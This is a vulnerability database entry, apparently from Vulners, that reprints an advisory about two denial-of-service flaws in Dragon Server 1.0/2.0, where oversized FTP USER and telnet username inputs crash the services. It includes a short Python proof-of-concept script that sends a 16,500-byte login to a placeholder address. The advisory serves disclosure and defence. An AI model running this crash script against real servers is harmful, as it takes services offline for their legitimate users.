Vulners
Lucene search
Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS
source: http://www.securityfocus.com/bid/1352/info
Two denial of service vulnerabilities exist in the Dragon Server package, versions 1.00 and 2.00, from Shadow Ops Software. By supplying large arguments to two different network services, it is possible to cause these services to be innaccessible.
By sending a USER command to the ftp server, and placing a buffer of approximately 16,500 characters as the argument to the command, it is possible to crash the ftp service.
By sending a buffer of approximately 16,500 characters to the telnet server in place of a user name, it is also possible to crash this service.
These both appear to be due to insufficient bounds checking.
#!/usr/bin/python
#
# Dragon Server(ftp) DoS Proof of Concept Code.
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)
# Simple Script by Prizm([email protected])
#
# By connecting to port 21(ftp) on a system running Dragon FTP Server
v1.00/2.00 and typing
# USER (16500 bytes) the service will crash
#
# This *simple* little script will cause Dragon Server's ftp service
to crash.
from ftplib import FTP
ftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with ip
ftp.login('A' * 16500)
ftp.quit()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1